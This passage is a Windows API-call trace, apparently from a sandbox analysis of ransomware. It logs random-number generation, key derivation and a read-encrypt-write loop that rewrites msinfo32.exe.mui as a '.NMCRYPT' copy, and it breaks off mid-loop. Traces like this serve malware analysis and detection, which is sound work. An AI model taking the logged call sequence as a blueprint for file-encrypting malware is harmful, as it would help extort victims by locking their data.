pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.311] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.312] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0161.313] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.313] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0161.314] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0161.314] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0161.314] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad7f8) returned 1 [0161.314] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0161.314] CryptSetKeyParam (hKey=0x9ad7f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0161.314] wcslen (_String="\\\\?\\") returned 0x4 [0161.314] CryptDuplicateKey (in: hKey=0x9ad7f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad1f8) returned 1 [0161.314] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0161.315] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0161.350] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=30208) returned 1 [0161.351] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0161.351] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.379] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.379] GetLastError () returned 0x0 [0161.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.426] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.426] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.426] GetLastError () returned 0x0 [0161.426] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.426] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.426] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.426] GetLastError () returned 0x0 [0161.426] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.427] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.427] GetLastError () returned 0x0 [0161.427] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.427] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.427] GetLastError () returned 0x0 [0161.427] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.427] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.427] GetLastError () returned 0x0 [0161.427] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.427] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.427] GetLastError () returned 0x0 [0161.427] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.427] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.427] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.428] GetLastError () returned 0x0 [0161.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.428] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.428] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.428] GetLastError () returned 0x0 [0161.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.428] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.428] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.428] GetLastError () returned 0x0 [0161.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.428] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.428] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.428] GetLastError () returned 0x0 [0161.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.428] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.428] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.428] GetLastError () returned 0x0 [0161.428] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.428] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.429] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.429] GetLastError () returned 0x0 [0161.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.429] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.429] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.429] GetLastError () returned 0x0 [0161.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.429] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2974e30*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0161.429] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0161.429] GetLastError () returned 0x0 [0161.429] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0161.429] ReadFile (in: hFile=0x1624, lpBuffer=0x2974e30, 